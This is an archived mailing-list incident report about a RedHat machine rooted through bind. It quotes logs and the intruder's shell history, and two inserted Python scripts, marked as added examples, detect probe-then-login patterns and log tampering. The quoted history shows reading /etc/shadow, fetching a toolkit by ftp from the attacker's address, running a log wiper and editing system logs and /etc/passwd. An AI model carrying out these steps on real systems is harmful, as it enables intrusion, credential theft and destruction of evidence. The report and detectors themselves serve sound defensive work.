Security Incidents mailing list archives
rooted by r0x - from address 212.177.241.127
From: dschauer () VCSD COM (Dwight Schauer)
Date: Wed, 29 Mar 2000 06:50:59 -0600
A machine that I am responsible for was rooted sometime between 12:04 and 12:06 CST on Mar 28, 2000. The machine had just had RedHat 6.1 installed and not all the updates were on it. I believe the intruder got in through bind (the version that was running at the time has known exploits, I know).

Mar 28 12:04:44 7of9 in.ftpd[15115]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.telnetd[15117]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.fingerd[15119]: refused connect from 212.177.241.127
Mar 28 12:04:45 7of9 sshd[15116]: refused connect from 212.177.241.127
Mar 28 12:06:06 7of9 in.telnetd[15125]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.ftpd[15115]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.telnetd[15117]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.fingerd[15119]: refused connect from 212.177.241.127
Mar 28 12:06:06 7of9 in.telnetd[15125]: refused connect from 212.177.241.127
Mar 28 12:06:38 7of9 in.telnetd[15128]: connect from 212.177.241.127
From my named/bind default directory:
drwxr-xr-x 2 root root 1024 Mar 28 12:05 ADMROCKS

That directory was not placed there by me. The version of bind running on the machine was bind-8.2.1-7 (it had bind-8.2.2_P3-1 before 6.1 was reinstalled on it; that update was somehow overlooked).

Mar 28 12:06:54 7of9 login: LOGIN ON 2 BY r0x FROM 212.177.241.127
Mar 28 12:06:54 7of9 PAM_pwdb[15129]: (login) session opened for user r0x by (uid=0)
Mar 28 12:09:08 7of9 sshd[15158]: Did not receive ident string from 212.177.241.127.
Mar 28 12:12:43 7of9 in.telnetd[15173]: connect from 212.177.241.127
Mar 28 12:12:59 7of9 login: LOGIN ON 3 BY r0x FROM 212.177.241.127
Mar 28 12:12:59 7of9 PAM_pwdb[15174]: (login) session opened for user r0x by (uid=0)
Mar 28 12:14:31 7of9 in.telnetd[15192]: connect from 212.177.241.127
Mar 28 12:14:43 7of9 login: LOGIN ON 2 BY r0x FROM 212.177.241.127
Mar 28 12:14:43 7of9 PAM_pwdb[15193]: (login) session opened for user r0x by (uid=0)

The cracker ran some things out of /tmp and then moved on to /usr/doc/gd-1.3/. There the cracker created a directory called FAQ and dumped his payload/toolkits in there. An attempt was made to edit the logs, but they had already been emailed elsewhere by logcheck. Pico was used to edit the logs, and pico saved a backup copy, or so it appears.
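The pattern in the lines above (a burst of tcp_wrappers "refused connect" entries from one address, then a successful telnet connect and a login by an account that should not exist, all within a few minutes) is the kind of thing a log watcher such as logcheck can be made to correlate instead of merely forwarding. The Python script below is an added example, not part of Dwight's post and not logcheck's own code: it parses syslog lines of the shape shown above (the sample lines are modelled on the post; the year 2000, the ten-minute window, the threshold of three refused connects and the list of known accounts are assumptions) and reports probe bursts, logins from an address that had just been probing, and logins by accounts not on the known list.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample, modelled on the tcp_wrappers and login lines in the post.
SAMPLE_LOG = """\
Mar 28 12:04:44 7of9 in.ftpd[15115]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.telnetd[15117]: refused connect from 212.177.241.127
Mar 28 12:04:44 7of9 in.fingerd[15119]: refused connect from 212.177.241.127
Mar 28 12:04:45 7of9 sshd[15116]: refused connect from 212.177.241.127
Mar 28 12:06:06 7of9 in.telnetd[15125]: refused connect from 212.177.241.127
Mar 28 12:06:38 7of9 in.telnetd[15128]: connect from 212.177.241.127
Mar 28 12:06:54 7of9 login: LOGIN ON 2 BY r0x FROM 212.177.241.127
Mar 28 12:06:54 7of9 PAM_pwdb[15129]: (login) session opened for user r0x by (uid=0)
Mar 28 12:09:08 7of9 sshd[15158]: Did not receive ident string from 212.177.241.127.
Mar 28 12:12:43 7of9 in.telnetd[15173]: connect from 212.177.241.127
Mar 28 12:12:59 7of9 login: LOGIN ON 3 BY r0x FROM 212.177.241.127
"""

# Classic syslog layout: "Mon DD HH:MM:SS host prog[pid]: message" (pid optional).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^\s:\[]+)(?:\[\d+\])?: (?P<msg>.*)$"
)
REFUSED_RE = re.compile(r"refused connect from (?P<ip>[\d.]+)")
LOGIN_RE = re.compile(r"LOGIN ON \S+ BY (?P<user>\S+) FROM (?P<ip>[\d.]+)")


def parse_line(line, year=2000):
    """Return (timestamp, host, program, message) or None for an unparsable line.
    Syslog lines carry no year, so the caller supplies it (assumed 2000, as in the post)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["host"], m["prog"], m["msg"]


def analyze(log_text, year=2000, window=600, min_refused=3, known_users=frozenset()):
    """Correlate events per source address and return (kind, ip, detail) findings.
    The window and threshold are assumptions for this example, not logcheck defaults."""
    refused = defaultdict(list)   # ip -> [(timestamp, service)]
    logins = defaultdict(list)    # ip -> [(timestamp, user)]
    for raw in log_text.splitlines():
        parsed = parse_line(raw, year)
        if parsed is None:
            continue
        ts, _host, prog, msg = parsed
        m = REFUSED_RE.search(msg)
        if m:
            refused[m["ip"]].append((ts, prog))
            continue
        m = LOGIN_RE.search(msg)
        if m:
            logins[m["ip"]].append((ts, m["user"]))

    findings = []
    for ip, hits in refused.items():
        services = sorted({svc for _, svc in hits})
        # Several different services refused from one address is a sweep, not a typo.
        if len(hits) >= min_refused and len(services) >= 2:
            findings.append(("multi_service_probe", ip,
                             f"{len(hits)} refused connects to {', '.join(services)}"))
            first_probe = min(ts for ts, _ in hits)
            # A login from the probing address shortly afterwards is the real alarm.
            for ts, user in logins.get(ip, []):
                delay = (ts - first_probe).total_seconds()
                if 0 <= delay <= window:
                    findings.append(("login_after_probe", ip,
                                     f"{user} logged in {int(delay)}s after first refused connect"))
    for ip, sessions in logins.items():
        for ts, user in sessions:
            if user not in known_users:
                findings.append(("unknown_account", ip,
                                 f"login by {user} at {ts:%H:%M:%S} not in known user list"))
    return findings


if __name__ == "__main__":
    # The known-user list is an assumption for the example.
    for kind, ip, detail in analyze(SAMPLE_LOG, known_users=frozenset({"dschauer"})):
        print(f"{kind:20} {ip:16} {detail}")
```

On the sample this produces one probe finding, two "login after probe" findings (130 s and 495 s after the first refused connect) and two unknown-account findings, all for the same address. Run against a real /var/log/messages or /var/log/secure, the known-user list should be generated from /etc/passwd on a trusted copy, since the root history later in the post shows /etc/passwd itself being edited.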
This is the .bash_history from /tmp:

cd /usr
cd doc
ls
cd gd-1.3
ls
mkdir FAQ
cd FAQ
ls
pwd
cat /etc/shadow
ps uxa | grep sshd
ls
ftp 212.177.241.127
ls
tar xvfz a.tar.gz
pico ulogin.c
pico ulogin.c
cd /usr/doc/gd-1.3/FAQ
chmod +x Uaz
./UAz
./Uaz
ls
ps uxa | grep suid
kill 15189
ls
ls
ls
ls
ftp updates.redhat.com
ls
cd bin
ls
./zap2 r0x
./zap2 r0x
./zap2 r0x
dddddddddddddd
exit

The ftp to updates.redhat.com was interesting; maybe he was going to upgrade bind for me ;-)

This is the .bash_history from root's account (in ~root) (with prior-to-attack history removed):

w
w
w
w
pico /etc/passwd
pico /etc/passwd
passwd games
cd /tmp
cp /var/log/messages ./
/usr/sbin/named
mv messages /var/log
pico /var/log/messages
pico /var/log/secure
pico /var/log/secure
pico /var/log/secure

The w's could have been me. Everything prior to the w's was most definitely me. The last root access I had to the machine was on the 27th of March (until after the attack). Like I said, I believe the compromise was through bind. If anyone thinks otherwise, let me know. If anyone wants them, I can give them the full log and history files, and the full payload that was dumped on me by the cracker.

--
Dwight Schauer <dschauer () vcsd com>
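Because logcheck had already mailed the logs off the box, the root history above (copy /var/log/messages to /tmp, edit with pico, move it back, edit /var/log/secure) can be checked precisely: compare the mailed copy with what is now on disk and every removed or rewritten line falls out. The script below is an added example, not something from the post or from logcheck: it takes the off-host copy and the on-host file (both constructed here from lines in the post; the rewritten address 10.0.0.5 is an invented value standing in for whatever an editor might have typed) and lists lines missing on the host, lines the host has that the off-host copy never saw, and the account names that appear in the removed login lines.

```python
import re
from difflib import SequenceMatcher

LOGIN_RE = re.compile(r"LOGIN ON \S+ BY (?P<user>\S+) FROM ")

# Constructed sample: the copy logcheck mailed off-host (lines modelled on the post).
OFFHOST_COPY = """\
Mar 28 12:06:38 7of9 in.telnetd[15128]: connect from 212.177.241.127
Mar 28 12:06:54 7of9 login: LOGIN ON 2 BY r0x FROM 212.177.241.127
Mar 28 12:06:54 7of9 PAM_pwdb[15129]: (login) session opened for user r0x by (uid=0)
Mar 28 12:09:08 7of9 sshd[15158]: Did not receive ident string from 212.177.241.127.
Mar 28 12:12:43 7of9 in.telnetd[15173]: connect from 212.177.241.127
Mar 28 12:12:59 7of9 login: LOGIN ON 3 BY r0x FROM 212.177.241.127
"""

# Constructed sample: the same log as found on the host afterwards, with the
# intruder's login lines gone and one address rewritten (10.0.0.5 is invented).
ONHOST_EDITED = """\
Mar 28 12:06:38 7of9 in.telnetd[15128]: connect from 212.177.241.127
Mar 28 12:09:08 7of9 sshd[15158]: Did not receive ident string from 10.0.0.5.
Mar 28 12:12:43 7of9 in.telnetd[15173]: connect from 212.177.241.127
"""


def compare_logs(offhost_text, onhost_text):
    """Return (missing, unexpected): lines of the off-host copy absent on the host,
    and lines on the host that the off-host copy never contained. Order-aware, so a
    line that merely moved is reported as both missing and unexpected."""
    a = offhost_text.splitlines()
    b = onhost_text.splitlines()
    missing, unexpected = [], []
    matcher = SequenceMatcher(None, a, b, autojunk=False)
    for tag, i1, i2, j1, j2 in matcher.get_opcodes():
        if tag in ("delete", "replace"):
            missing.extend(a[i1:i2])
        if tag in ("insert", "replace"):
            unexpected.extend(b[j1:j2])
    return missing, unexpected


def accounts_in(lines):
    """Account names named in LOGIN lines among the given log lines."""
    return {m["user"] for line in lines for m in [LOGIN_RE.search(line)] if m}


def tamper_report(offhost_text, onhost_text):
    """Summarise the comparison as a dict a responder can act on."""
    missing, unexpected = compare_logs(offhost_text, onhost_text)
    return {
        "tampered": bool(missing or unexpected),
        "missing": missing,
        "unexpected": unexpected,
        "scrubbed_accounts": sorted(accounts_in(missing)),
    }


if __name__ == "__main__":
    report = tamper_report(OFFHOST_COPY, ONHOST_EDITED)
    print("tampered:", report["tampered"], "accounts scrubbed:", report["scrubbed_accounts"])
    for line in report["missing"]:
        print("- ", line)
    for line in report["unexpected"]:
        print("+ ", line)
```

On the sample, four lines are missing on the host (both r0x logins, the PAM session line and the original ident line), one rewritten line is unexpected, and the only account scrubbed is r0x. The same comparison works for /var/log/secure; the off-host copy must come from the mail archive or a remote syslog host, never from a backup that the compromised machine itself could reach and edit.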